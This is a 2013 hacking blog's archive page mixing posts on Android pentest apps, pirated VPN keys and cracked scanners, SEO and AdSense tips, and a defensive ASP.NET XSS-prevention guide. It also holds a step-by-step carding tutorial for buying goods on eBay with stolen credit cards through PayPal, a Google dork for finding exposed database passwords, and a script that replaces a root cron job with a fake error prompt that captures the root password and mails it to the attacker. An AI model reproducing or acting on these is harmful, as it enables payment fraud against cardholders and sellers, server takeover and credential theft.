Friday, April 5, 2013

Top 5 Pentration Testing Applications For You Android Smart Phone

Filled under:

In The Previous Post I Have Shared Top 5 Pentration Testing Operating System's Based On Linux But In This Post I Am Sharing Top 5 Pentration Testing Applications For You Android Smart Phone This Post Is Some What Linked To The Previous Post Because In this Post In Will Be Telling Pentration Testing Apps For Android Which Is Linux Based O.S :)) With Easy Tools Which I Am Also Using You Can See The Screenshot Of My Phone Below.

Note : You Phone Must Be Rooted To Use Them Properly ...

Lets Come On The Topic My List Starts With :

Top 5 Pentration Testing Applications For You Android Phone

shot_000001

1. dSploit : 

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc . This application is still in beta stage, a stable release will be available as soon as possible, but expect some crash or strange behaviour until then, in any case, feel free to submit an issue on GitHub.

2. Shark :

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too).To open dump use WireShark or similar software, for preview dump on phone use Shark Reader Based on tcpdump.

3. The Android Network Toolkit :

In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.

4. AnDOSid :

DOS or denial of service attack is very dangerous attack because it takes down the server (computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!

 5.Nmap :

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

 

Posted By Unknown9:47 AM

Saturday, March 2, 2013

Express VPN Premium VPN Worth 13$ For Free

Hi Guys This Is DJ Alone... Today I'm Posting KEY For Express VPN...


Express VPN is a Premium VPN... U Had To Pay 13$ Every Month If U Want To Use That...
Express VPN


First Of All Download The Express VPN From Here...

http://www.mediafire.com/?w9l84ohy17539s2

Then Install It... & It Will Ask The KEY...

Download Its Premium KEY From BELOW Link & Enter It In EXPRESS VPN...

http://www.mediafire.com/view/?iviqjv6j2tijz1j

Working ScreenShot For Express VPN Taken On 3 Mar 2013...

If That Key Is Not Working For U...
Use This...
EQK9I206TKTYY7WEP6MYVHN


Hurry Download The Software & Key...

Note :- Key is Valid For One Month... But Expires Tomorrow So Download It & Use It...

Posted By आर्यावर्त11:15 PM

Real SQL V0.3

Filled under: ,


Here comes a post after a long holidays from blogging due to my exams. This is about one of my favs SQli scanner. Its called Real SQLi. Just found this so thought of posting here.
What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!
This is the main GUI of the application and in later screenshots I will show you it's features.


Here is the search function and you can see it is returning a vulnerable URL
The search is complete and there were 3 vulnerable URLs found!

This is the save button making a .txt file of all the working links
Showing the contextual menu in the results box  

Download this from here : http://dl.dropbox.com/u/98292500/Real%20SQL.exe

...PROTOTYPE...

Posted By z0mb136:35 AM

Thursday, February 28, 2013

GO DADDY COUPON CODE - Buy Domain At 1.49 $

Hi Guys This is DJ Alone... I'm Sharing A Coupon Code For GODADDY.COM...

BY Using This Coupon U Can Buy .COM Domain In Only 1.49$ (91.36 INR.)

Just Go To GoDaddy.Com

Go Daddy Is The Most Famous Domain Provider... Best Domain Providers...




Use This Coupon Code...To Buy Domain at 1.49 $




LKSRTL149

This Code Is Expiring On 1 March 2013...

Posted By आर्यावर्त5:53 AM

Wednesday, February 27, 2013

What Is Socks ?

What is socks ???



Hi Guys This Is DJ Alone... In This Post I Will Tell U...

What is Socks ???


SOCKets or SOCKS-Proxies (=Secured Over Credential-based Kerberos Services) are very similar to HTTP Proxy Server. The main difference is that they have the capability to redirect all traffic (Web, FTP, POP3, Torrent…) through a Proxy Server while HTTP-Proxies only redirect HTTP (Port 80) requests.

SOCKS-Proxies have a wide range of benefits but the most important is that they provide complete anonymity and protects all your traffic (including DNS-requests). This means that the remote server will only see the SOCKS-Server IP (Internet Protocol) instead of the real IP you got from your Internet Service Provider. Hence, absolute anonymity is evident.


But why generally use a Proxy or is it better to surf without one?

1. To hide your real identity/IP-Address

2. Unblock websites (some countries/ISP's block websites or social networks like facebook, twitter, youtube)

3. Bypass your proxy at school or work

4. Very useable for SEO-Programs

A few SOCKS Proxies even support the SMTP-Port (25) which allows you to send the Emails anonymously.

If you want to extend your Anonymity you can chain different kind of proxies together.

Examples:
SOCKS Proxy > HTTP Proxy > CGI Proxy
SOCKS Proxy > HTTP Proxy
HTTP Proxy > SOCKS Proxy
SOCKS Proxy > CGI Proxy

There are a few programs to run your own SOCKS-Proxy-Server like: SS5, WinSocks, OpenSSH, Dante, Sun Java System Web proxy, Free Cap and Freeproxy.

The benefit of using public a SOCKS5 List instead of a private server is that you get a wide range of IP-Addresses and servers from all over the world which hides you identity even more.


How to use socks(Fire fox)  ???

Firefox is the most powerfull and extendable browser in the world. So how to use socks with Firefox 3, is it hard to configure and use? No, it easy.

Run Firefox

Go to Tools  → Options


Click Advanced and choose Network, then Settings
Choose Manual proxy configuration and place IP address to SOCKS Host, port to Port

After that choose SOCKS v4 for 4 version of socks or SOCKS v5 for 5 version of socks...



Click OK

Enjoy using socks in Firefox

For comfortable socks switching and configuring you can use FoxyProxy extension for Firefox...

Posted By आर्यावर्त6:41 AM

What Is Carding ? Carding Tutorial

Hi Guys This Is DJ Alone...
In this tutorial , i will teach you the terms “carding” , “scamming” , “cvv2″ etc. I’ll also tell some tricks for sites such as ebay.com , ebay.co.uk , actually just ebay

 let’s start with explaining the term “CARDING”

 Chapter 1 : Introduction and Tips.

 Carding , or scamming as other people would say , is an art. It’s basically ordering items from the Net (cellphones , laptops, PDA’s , TV’s ,……) without actually
 paying for it . or at least , not paying with your own money

 Now you’ll all be wondering how we do this stuff.
 Well , most sites accept credit cards as a payment form . These credit cards can be obtained from mIRC or from public forums , which i won’t display here
 due to security reasons.

 For the dummies : a creditcard is a 16 digit number which can be used to pay , some sort of bank card.

 There are different types of creditcards :

 Visa
 Mastercard(MC)
 American Express (AMEX)
 Discover
 Novus
 JCB

 When you obtain a creditcard , you have to recognise the type .

 A card starting with a 4 is a Visa , with a 5 is a Mastercard , with a 3 (15 digits long) is an Amex , with a 6 is Dicover/JCB.

 Some sites might ask for a CVV2 , this is the tree digit verification code on the back of the card.
 Mostly this is also pasted on the forum or mIRC channel.

 Note : Amex has a 4 digit verification code , and for discover 000 can be used.

 Now there are some tips and tricks when you want to order something .

 * Look for a site with a shitty layout , they’ll probably have a shitty security and are “cardable” (this means you cane asily get stuff from the site )
 * Try to use Discover or Amex , these cards are less involved with chargebacks etc and most merchants (payment processors) won’t verify these cards , instead of visa and
 mastercard , which have alot of chargebacks.
 * Don’t use a store in your own country , especially not big ones . Ebay.co.uk is one of the best cardable sites if you have the right techniques..

 When ordering , sites will ask for a billing adress and a shipping adress.
 The billing adress is the adress listed on the creditcard , the shipping adress is your adress or a drop adress , a so called “delivery adress”.

 As you might have noticed , i oftenly mentioned ebay as a site to buy goods from.
 But ebay doesn’t use an instant paying service , they offer online paying services such as Paypal and Auctionpayments.com .
 These sites gladly accept all types of creditcards , from all over the world .

 Chapter 2 : Ebay , Paypal.com

 Ebay

 As you will probably know , ebay.com is an online auction site where goods can be sold and bought by people over the world.
 This site is one of the most visited shopping sites , because of its large variety of goods and prices , which can be lower then store prices.

 Now the question is : how to contact the seller and arrange the fraudulent deal.

 Well , to contact the seller you will need an ebay buyer account.This means you have to register yourself at www.ebay.com , and do NOT use your real information , because
 they will ask you to provide a creditcard and that one has to match with the adress on the card , so just use the cardholder’s info.
 Also use a valid email adress , a yahoo or hotmail one for example , because you have to confirm your registration , and also the seller(s) will reply to you on that email adress.

 If you see an item and you want to buy it , first ask the seller a question.
 A question which will work well is the following one :

 Hi there,
 i am from USA and i am interested in purchasing this item from you .
 i would like to pay this item with my paypal
 But the item is a gift for my cousin in Belgium
 can you gift wrap the package and calculate shipping costs for 2-3 days delivery?
 please reply me with a total price and your paypal adress.

 With this message i received alot of items , including cellphones , a PDA , shoes , a laptop , software, etc.

 Paypal

 Now i will (finally) explain the meaning of the word Paypal.

 Paypal.com us an online payment method , which is used by alot of ebayers , and can be funded by bank transfers or creditcards (whoohoo)

 All you need for this is a USA cvv2 (see chapter 1) and a valid email adress.

 Visit www.paypal.com & click on Register/Sign up.
 Fill in the form with the creditcard info (name , adress, city, state, zipcode , country , etc) and the email adress you are using for Ebay.
 On the bottom of the page they will ask you to pick 2 security questions and give an answer on those questions , in case you forget your password.
 Pick any random question and fill it in with random info , paypal cannot verify it .
 After you have signed up , go to your email inbox & click on the paypal email .
 Inside you will find a link which you’ll have to click in order to confirm the registration. You’ll visit a page which will ask you to confirm your paypal password.
 Fill it in, click on submit , and paypal will ask you to add a bank account. We aren’t interested in this , so click on Skip.
 Then you’ll see your account overview. In the left menu , click on Add a Credit Card.
 On that page it’ll ask you the cardholder’s name , the ccnumber , type of creditcard (see chapter 1) , the expiry date and the Cvv2 (cfr. Chapter 1)
 If all information is valid , click on Submit and hopefully you’ll get a message saying : you have succesfully added a creditcard . Blablablaa…….
 If you are unlucky , you’ll get one of the following errors :

 * This creditcard has already been assigned to another paypal account , please use a different card.(no explenation needed)
 * You have entered an invalid or partial credit card number (cc number is incorrect)
 * Your card has been declined because we could not verify the 3-4 digit code on the back of your card . (cvv2 is invalid)
 * This card has been declined by your bank issuer . (card is invalid)

 After you have successfully added a card , look in your email inbox for some replies from sellers which will contain a full price for the item.
 Go to your paypal account, click on Send Money.Fill in the recipient (seller’s paypal email) , the amount , and pick Auction Goods (non Ebay)
 on the next page create a item number (10 digits maxium) , and a buyer ID (johndoe4852 for example). As auction site , select Other.
 Then click on Continue , it’ll bring you to a new screen to confirm the information you entered.
 As funding source , you’ll see that the credit card is selected .
 On bottom you ‘ll see that paypal automatically selects the credit card adress as shipping adress. Leave this indicated like this , it’ll give the transaction a very legit look.
 Then click on Confirm and hope for the best . If your purchase was succesfull , you’ll get a message saying you’ve sent cash or you paid for an online auction.
 Then return to your paypal account & Log Out . Go to your inbox , tell the seller the money has been sent and provide the shipping adress in the email.
 Also ask him to mail you back once the package is shipped...

Credits To :- LNXROOT.NET

Posted By आर्यावर्त5:54 AM

Monday, February 18, 2013

Get Usename & Password Database By Google

This Tutorial Is about Finding Username, Passwors, Databases with Google
so lets Start ...  


1- open Google.com

2- Enter This Dork 
  • filetype: This "pdo_mysql" (pass | passwd | password | pwd)   
See the Search Results Almost 10,900
If you did nt find this type results then click on 2-3-4.....30 pages. finally you'll find many websites...

Now Click on site, You will got all datbase of website,

Posted By आर्यावर्त8:18 AM

Sunday, February 17, 2013

12 Ways To Improve Your Chance On Getting AdSense Approval

Hi Guys...This Is DJ Alone... Health is Low At This Time Also... Unable To Speak...But Had To Do Work... I'm Recently Tried To Approve Google AdSense... But They Rejected Me Third Time...So, I Do Some Research On That... Hope U Guys Also Want To Join AdSense... Some Of You Already Gets It...Some Of You Guys is Waiting... So , Here is a Way To Improve Ur Chance In Getting AdSense Approval... Must Try This Steps Once...
12 Ways To Improve Your Chance On Getting AdSense Approval

All You have to do is Do The Following things before applying for adsense...

What is AdSense ? Why U Should Use Google AdSense ?

Google Adsense is world’s largest Ads Network and works at Pay Per Click system...It’s paying rates are better than all of other networks which is the biggest reason it is so popular to all Bloggers and Webmasters...So,Everybody is running behind them, That Why they have made the approval system very strict... You make little mistakes and get disapproved every time...So, you need a complete guidance and list of thing that you need to do before applying for Google Adsense and i m thinking that you are ready to follow me...



12 Things You Had To Do Before Applying for Google Adsense :-

1. Privacy Policy :-

One of the common mistake that every Blogger makes...Even though there are people out there who say that having a Privacy Policy for a Blog doesn’t makes sense but they are Completely wrong...

A Privacy actually describes to your readers about what they will get on your Blog,what they should do and what they should not...So,obviously there is nothing bad in having a Privacy Policy... 

While it can affect somehow on your Adsense Approval, you must give it a try... You can write it yourself or find Privacy Policy Generators online...

2. About Page

About Page has amajor role & importance if you don’t want to apply for Adsense...But when it comes to Adsense, they are about Zero chances of getting approved if you are not showing this page...About page simply describes about you & your Blog...This will not only help you making a relationship with readers but it will also make them trust upon you...

3. Contact Us Page

This Page Gives Opportunity to Your Readers To Contact You... & Speak with you and tell how they feel about your Blog...what they want to be edited & what they liked or hated...
It will also show the Google Adsense Team that is viewing your site that you actually care about your readers and not only the money and Adsense...

4. Name/ Email Verification



Make sure to put your name & Email address in some easily visible area like About Me & Contact Us pages...It will confirm to Google Adsense Team that it is the same person who applied for Adsense and not some spam Or Some crappy bots...

5. Age Verification

If You Are Not Getting AdSense You Are Not 18 + (Obviosly Google Thinks It)...Because Google Adsense is not for under 18 people...I realized this problem after a Lot Research About It...So,I advice you to be accurate while typing your age...

6. Minimum Number of Posts

There is no exact answer about this...Not even a Single One...Because I have seen very a Lot Of Blogs with 500+ posts & their owners are telling me that Google Adsense is rejecting them...While People with 40-50 posts are enjoying making money...Exactly what I said that there is no actual answer...
However,we can always try with People's Predictions...According to my Research,you should only apply When you have more than 70 posts...
Post's length must be 500+ words too...

7. Design

Your Blog's Design is the biggest thing after Its Content...This represents your experience and Professionalism...So be careful because anything can kill your Chances...

8. Content Type

Be careful with what type of content you are publishing...Because it is something that truly matters...Google Adsense is not for Pornographic, Illegal Items, Drugs or other Blogs/Sites like that...
Also Adsense team won’t allow you to step in if you own a Non English Blog...Having posts shorter than 300 words in length is also Cause You a Red Signal...

9. Providing Value

Don’t complain about not making money and don’t clearly state that your are Blogging for Money only & has no other interest in it...Because this will show them that you will not be providing values to your readers any day...And You Will Get another Red Light...

10. Top Level Domain

Those Days are gone far away when AdSense is used to approve “Blogspot” and “WordPress.com” Blogs...As for today, you must have your own Unique Domain that specifies your Blog...If you don’t have one yet,stop Dreaming about getting approved with Sub domains...So, go buy a Top Level Domain...

Another important thing about The Domain is.. It's Age...Because For most of Asian Countries AdSense has placed an Age Restriction...They Don’t Accept any sites Before they are 6 months old... As i Heard From My Friend...


11. Other Ad Networks

If you have any other Ads placed like Chitika,Clicksor Or anything,It’s time Remove Them When You Are Submitting For Approval...

Even Google Adsense allows you to use other Ad Networks along with them,it’s better to remove the ads before Applying & don’t put them back until you get a reply from Adsense Team...

12. Paid Traffic

Google hates the sites that are getting Paid traffic...So,there is not a damn chance of getting Adsense Approval letter for a site that is getting paid traffic...You can bring traffic from Search Engines Or From any other way you want..
But if you want to earn via Google Adsense By the right way Then paid traffic is not a solution...

What To Do IF Adsense Is Not Getting Approved ???

If google adsense still not approving your website/blog...You can use these websites to earn money without adsense...

Affiliate Marketing
Bidvertise
Chitika
ClickSor

InfoLinks

ReviewMe



This will take your few time & you have to Do these things Before Applying for Google Adsense...
I guess these things are not too hard...Don’t be sad if Google adsense not approve your blog...There are many other ways to make money online without adsense...






Posted By आर्यावर्त2:06 AM

Wednesday, February 13, 2013

Rooting a Server without Local Root Kernel Exploits

Hi Guys...This is DJ Alone...Last Days I Got 3 Servers...Its Just a Good Week For Me...And Today I Got A Little Health Problems Also...But I Decided To Share a Good Method With U Guys...

When Ever We Got Server We Want To Root It...So We Are Trying To Beg LOCAL Root Kernel Exploit... Recently i Saw a Method That is Easy and It Can Help Us Rooting The Server...So Let's Move To The Topic...

How to Root a Server when there isn’t any Local Root Kernel Exploit available ???


You can do it with Cron Tab Scripts...

Cron Jobs are some Tasks that are set to be Executed at a specific time.If the Root user has created a Custom Script used by Cron, then we can
Write on this File, we can send a “Fake” Error Message and the Root user will probably type his password...


First, check out if there are any Cron Job Tasks :-

Code :-

crontab -l

okay we got a Custom script here , you can see backup.sh is the script...



here you can see it has 755 permission

Make a Copy of the Original Script !!

Okey now replace the code of original file with this :- 


Code :-


#!/bin/shecho “An System Error Occured!”
echo “”echo “Error Code: #131425″echo “”echo “Update to get the Latest Patch for this Security Issue.”read -s -p “[sudo] password for root ” rootpasswdecho “”echo “su: Authentication failure”echo “”sudo apt-get update && sudo apt-get upgradesudo echo “The Password is: $rootpasswd” > .kodmail -s “Root’s Password” “email@address.com” < .kodrm .kodmv backup.sh backup



You just had to Replace the E-mail id with your E-Mail and the Name of the Script...

After you save the File, 

type: chmod +x cronscript to set it as Executable...

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)

When the Script gets Executed, the Root User will Enter his Password and it will be send to you...

Posted By आर्यावर्त3:18 AM

Sunday, February 10, 2013

IDM 6.15 PreActivated (Download)

Posted By आर्यावर्त4:47 AM

Wednesday, February 6, 2013

Acunetix 8 Full Version Download

Acunetix Scanner v8.0.20111215 Cracked

Posted By आर्यावर्त8:51 AM

What Is Acunetix ?

Hi Guys...This is DJ Alone...Today I Was Just Checking My Friend's Site...and Found Lot Of Vulnerabilities In It...How To Check Ur Website is Vulnerable Or Not... So Let's See How What It Can Do For Us ?

What Is Vulnerability ?

In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance...
Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw... To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface...

What Is Acunetix ?


Acunetix is a Vulnerability scanner That Helps U To Find Vulnerability In Ur Site... It Is A Most Used Tool...By Using Acunetix U Can Easily Find Vulnerabilites In Ur Site...U Can Easily Fix Errors & Secure Ur Website Easily...


Is Your WebSite Vulnerable ?

  • 70% of all cyber-attacks target web applications
  • Make sure your website isn't vulnerable to web attacks
  • Check if it is with Acunetix WVS
Easily Scan Your Website For

  • SQL Injection
  • Cross-Site Scripting
  • Other vulnerabilities
Generate Regulatory Compliance Reports
  • PCI DSS Data
  • OWASP Top 10 Vulnerabilities
  • HIPAA Compliance Reports
Advanced Penetration Testing Tools
  • HTTP Editor
  • Sniffer
  • Fuzzer
  • and more...
Scan Web 2.0 Applications
  • State of the art CSA engine
  • Comprehensive scan of latest web technologies
In Next Post I Will Post The Link Of Acunetix For My Readers...

Posted By आर्यावर्त8:31 AM

Tuesday, February 5, 2013

What is SEO ?

Hi Guys... This is DJ Alone...It's Too Late That I'm Writing This Article...But...Some People Keep Asking Me What is SEO ? Plz Teach Me SEO ? So,I Maded This Post For Them...

Search engine optimization (SEO) is the process of affecting the visibility of a website or a web page in a search engine's "natural" or un-paid ("organic") search results.[jargon] In general, the earlier (or higher ranked on the search results page), and more frequently a site appears in the search results list, the more visitors it will receive from the search engine's users. SEO may target different kinds of search, including image searchlocal searchvideo searchacademic search,[1] news search and industry-specific vertical search engines...

People Almost Searchs 16 Billion Querys Every Month...& Every Site Want To Get High Rank...and get the leverage on pay per click advertisements. And hence the visitors are turned into a medium of earning. One must follow a strategy in order to boost his or her website. If you don't understand how to apply these strategies then your customers are diverted to your competitors...

In Technical words this strategy is called as Search Engine Optimization (SEO)SEO is the process of improving the visibility of a website or a web page in search results. It is a method of getting your website to a higher rank in search engines like Google, Yahoo and Bing...

When a user searches some relevant content in Google or Yahoo, you want your website to be the first link in the search result. SEO helps the search engines to recognize your website for the search of specific keywords. Optimizing a website may involve editing its content and HTML and associated coding to both increase its relevance to specific keywords. All in all the search engine optimization process includes researching keywords, creating content and making sure your website is visible in the search engines. Promoting a site to increase the number of backlinks, or inbound links is another SEO

Posted By आर्यावर्त8:49 AM

Sunday, February 3, 2013

How To Prevent Cross-Site Scripting (XSS) in ASP.NET

Hi Guys... This is DJ Alone...This Time I Thinked To Help U Guys By Posting How To Prevent XSS...

So, I'm Posting This...By This Post U Can Easily Secure Ur Website From Cross-Site Scripting Attack...

In Previous Posts We Have Seen What Is Cross Site Scripting & How It Works....If U Reading This Post First Time... First Read The XSS Post Here...


This How to shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output. It also describes a number of other protection mechanisms that you can use in addition to these two main countermeasures.

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting client-side script code. Common vulnerabilities that make your Web applications susceptible to cross-site scripting attacks include failing to properly validate input, failing to encode output, and trusting the data retrieved from a shared database. To protect your application against cross-site scripting attacks, assume that all input is malicious. Constrain and validate all input. Encode all output that could, potentially, include HTML characters. This includes data read from files and databases.

Contents

Objectives
Overview
Summary of Steps
Step 1. Check That ASP.NET Request Validation Is Enabled
Step 2. Review ASP.NET Code That Generates HTML Output
Step 3. Determine Whether HTML Output Includes Input Parameters
Step 4. Review Potentially Dangerous HTML Tags and Attributes
Step 5. Evaluate Countermeasures
Additional Considerations
Additional Resources
Objectives

Understand the common cross-site scripting vulnerabilities in Web page validation.
Apply countermeasures for cross-site scripting attacks.
Constrain input by using regular expressions, type checks, and ASP.NET validator controls.
Constrain output to ensure the browser does not execute HTML tags that contain script code.
Review potentially dangerous HTML tags and attributes and evaluate countermeasures.
Overview

Cross-site scripting attacks exploit vulnerabilities in Web page validation by injecting client-side script code. The script code embeds itself in response data, which is sent back to an unsuspecting user. The user's browser then runs the script code. Because the browser downloads the script code from a trusted site, the browser has no way of recognizing that the code is not legitimate, and Microsoft Internet Explorer security zones provide no defense. Cross-site scripting attacks also work over HTTP and HTTPS (SSL) connections.

One of the most serious examples of a cross-site scripting attack occurs when an attacker writes script to retrieve the authentication cookie that provides access to a trusted site and then posts the cookie to a Web address known to the attacker. This enables the attacker to spoof the legitimate user's identity and gain illicit access to the Web site.

Common vulnerabilities that make your Web application susceptible to cross-site scripting attacks include:

Failing to constrain and validate input.
Failing to encode output.
Trusting data retrieved from a shared database.
Guidelines

The two most important countermeasures to prevent cross-site scripting attacks are to:

Constrain input.
Encode output.
Constrain Input

Start by assuming that all input is malicious. Validate input type, length, format, and range.

To constrain input supplied through server controls, use ASP.NET validator controls such as RegularExpressionValidator and RangeValidator.
To constrain input supplied through client-side HTML input controls or input from other sources such as query strings or cookies, use the System.Text.RegularExpressions.Regex class in your server-side code to check for expected using regular expressions.
To validate types such as integers, doubles, dates, and currency amounts, convert the input data to the equivalent .NET Framework data type and handle any resulting conversion errors.
Encode Output

Use the AntiXSS.HtmlEncode method to encode output if it contains input from the user or from other sources such as databases. HtmlEncode replaces characters that have special meaning in HTML-to-HTML variables that represent those characters. For example, < is replaced with &lt; and " is replaced with &quot;. Encoded data does not cause the browser to execute code. Instead, the data is rendered as harmless HTML.

Similarly, use AntiXSS.UrlEncode to encode output URLs if they are constructed from input.

Summary of Steps

To prevent cross-site scripting, perform the following steps:

Step 1. Check that ASP.NET request validation is enabled.
Step 2. Review ASP.NET code that generates HTML output.
Step 3. Determine whether HTML output includes input parameters.
Step 4. Review potentially dangerous HTML tags and attributes.
Step 5. Evaluate countermeasures.
Step 1. Check That ASP.NET Request Validation Is Enabled
By default, request validation is enabled in Machine.config. Verify that request validation is currently enabled in your server's Machine.config file and that your application does not override this setting in its Web.config file. Check that validateRequest is set to true as shown in the following code example.

<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>

You can disable request validation on a page-by-page basis. Check that your pages do not disable this feature unless necessary. For example, you may need to disable this feature for a page if it contains a free-format, rich-text entry field designed to accept a range of HTML characters as input.

To test that ASP.NET request validation is enabled

Create an ASP.NET page that disables request validation. To do this, set ValidateRequest="false", as shown in the following code example.
<%@ Page Language="C#" ValidateRequest="false" %>
<html>
 <script runat="server">
  void btnSubmit_Click(Object sender, EventArgs e)
  {
    // If ValidateRequest is false, then 'hello' is displayed
    // If ValidateRequest is true, then ASP.NET returns an exception
    Response.Write(txtString.Text);
  }
 </script>
 <body>
  <form id="form1" runat="server">
    <asp:TextBox id="txtString" runat="server"
                 Text="<script>alert('hello');</script>" />
    <asp:Button id="btnSubmit" runat="server"
                OnClick="btnSubmit_Click"
                Text="Submit" />
  </form>
 </body>
</html>

Run the page. It displays Hello in a message box because the script in txtString is passed through and rendered as client-side script in your browser.
Set ValidateRequest="true" or remove the ValidateRequest page attribute and browse to the page again. Verify that the following error message is displayed.
A potentially dangerous Request.Form value was detected from the client (txtString="<script>alert('hello...").

This indicates that ASP.NET request validation is active and has rejected the input because it includes potentially dangerous HTML characters.

Note: Do not rely on ASP.NET request validation. Treat it as an extra precautionary measure in addition to your own input validation.


Step 2. Review ASP.NET Code That Generates HTML Output
ASP.NET writes HTML as output in two ways, using "Response.Write" and "<% = ". Search your pages to locate where HTML and URL output is returned to the client.

Step 3. Determine Whether HTML Output Includes Input Parameters
Analyze your design and your page code to determine whether the output includes any input parameters. These parameters can come from a variety of sources. The following list includes common input sources:

Form fields, such as the following.
Response.Write(name.Text);
Response.Write(Request.Form["name"]);
Query Strings
Response.Write(Request.QueryString["name"]);

Query strings, such as the following:
Response.Write(Request.QueryString["username"]);

Databases and data access methods, such as the following:
SqlDataReader reader = cmd.ExecuteReader();
Response.Write(reader.GetString(1));

Be particularly careful with data read from a database if it is shared by other applications.

Cookie collection, such as the following:
Response.Write(
Request.Cookies["name"].Values["name"]);

Session and application variables, such as the following:
Response.Write(Session["name"]);
Response.Write(Application["name"]);

In addition to source code analysis, you can also perform a simple test by typing text such as "XYZ" in form fields and testing the output. If the browser displays "XYZ" or if you see "XYZ" when you view the source of the HTML, your Web application is vulnerable to cross-site scripting.

To see something more dynamic, inject <script>alert('hello');</script> through an input field. This technique might not work in all cases because it depends on how the input is used to generate the output.

Step 4. Review Potentially Dangerous HTML Tags and Attributes
If you dynamically create HTML tags and construct tag attributes with potentially unsafe input, make sure you HTML-encode the tag attributes before writing them out.

The following .aspx page shows how you can write HTML directly to the return page by using the <asp:Literal> control. The code takes user input of a color name, inserts it into the HTML sent back, and displays text in the color entered. The page uses HtmlEncode to ensure the inserted text is safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <form id="form1" runat="server">
    <div>
      Color:&nbsp;<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox><br />
      <asp:Button ID="Button1" runat="server" Text="Show color"
         OnClick="Button1_Click" /><br />
      <asp:Literal ID="Literal1" runat="server"></asp:Literal>
    </div>
  </form>
</html>

<script runat="server">
  private void Page_Load(Object Src, EventArgs e)
  {
    protected void Button1_Click(object sender, EventArgs e)
    {
      Literal1.Text = @"<span style=""color:"
        + Server.HtmlEncode(TextBox1.Text)
        + @""">Color example</span>";
    }        
  }
</Script>

Potentially Dangerous HTML Tags

While not an exhaustive list, the following commonly used HTML tags could allow a malicious user to inject script code:

<applet>
<body>
<embed>
<frame>
<script>
<frameset>
<html>
<iframe>
<img>
<style>
<layer>
<link>
<ilayer>
<meta>
<object>
An attacker can use HTML attributes such as src, lowsrc, style, and href in conjunction with the preceding tags to inject cross-site scripting. For example, the src attribute of the <img> tag can be a source of injection, as shown in the following examples.

<img src="javascript:alert('hello');">
<img src="java&#010;script:alert('hello');">
<img src="java&#X0A;script:alert('hello');">

An attacker can also use the <style> tag to inject a script by changing the MIME type as shown in the following.

<style TYPE="text/javascript">
  alert('hello');
</style>

Step 5. Evaluate Countermeasures
When you find ASP.NET code that generates HTML using some input, you need to evaluate appropriate countermeasures for your specific application. Countermeasures include:

Encode HTML output.
Encode URL output.
Filter user input.
Encode HTML Output

If you write text output to a Web page and you do not know if the text contains HTML special characters (such as <, >, and &), pre-process the text by using the AntiXSS.HtmlEncode method as shown in the following code example. Do this if the text came from user input, a database, or a local file.

Response.Write(AntiXSS.HtmlEncode(Request.Form["name"]));

Do not substitute encoding output for checking that input is well-formed and correct. Use it as an additional security precaution.

Encode URL Output

If you return URL strings that contain input to the client, use the AntiXSS.UrlEncode method to encode these URL strings as shown in the following code example.

Response.Write(AntiXSS.UrlEncode(urlString));

Filter User Input

If you have pages that need to accept a range of HTML elements, for example through some kind of rich text input field, you must disable ASP.NET request validation for the page. If you have several pages that do this, create a filter that allows only the HTML elements that you want to accept. A common practice is to restrict formatting to safe HTML elements such as bold (<b>) and italic (<i>).

To safely allow restricted HTML input

Disable ASP.NET request validation by the adding the ValidateRequest="false" attribute to the @Page directive.
Encode the string input with the HtmlEncode method.
Use a StringBuilder and call its Replace method to selectively remove the encoding on the HTML elements that you want to permit.
The following .aspx page code shows this approach. The page disables ASP.NET request validation by setting ValidateRequest="false". It HTML-encodes the input and then selectively allows the <b> and <i> HTML elements to support simple text formatting.

<%@ Page Language="C#" ValidateRequest="false"%>

<script runat="server">
  void submitBtn_Click(object sender, EventArgs e)
  {
    // Encode the string input
    StringBuilder sb = new StringBuilder(
                         AntiXSS.HtmlEncode(htmlInputTxt.Text));

  // Selectively allow  <b> and <i>
    sb.Replace("&lt;b&gt;", "<b>");
    sb.Replace("&lt;/b&gt;", "");
    sb.Replace("&lt;i&gt;", "<i>");
    sb.Replace("&lt;/i&gt;", "");
    Response.Write(sb.ToString());
  }
</script>


<html>
  <body>
    <form id="form1" runat="server">
      <div>
        <asp:TextBox ID="htmlInputTxt" Runat="server"
                     TextMode="MultiLine" Width="318px"
                     Height="168px"></asp:TextBox>
        <asp:Button ID="submitBtn" Runat="server"
                     Text="Submit" OnClick="submitBtn_Click" />
      </div>
    </form>
  </body>
</html>

Additional Considerations

In addition to the techniques discussed previously in this How to, use the following countermeasures as further safe guards to prevent cross-site scripting:

Set the correct character encoding.
Do not rely on input sanitization.
Use the HttpOnly cookie option.
Use the <frame> security attribute.
Use the innerText property instead of innerHTML.
Set the Correct Character Encoding

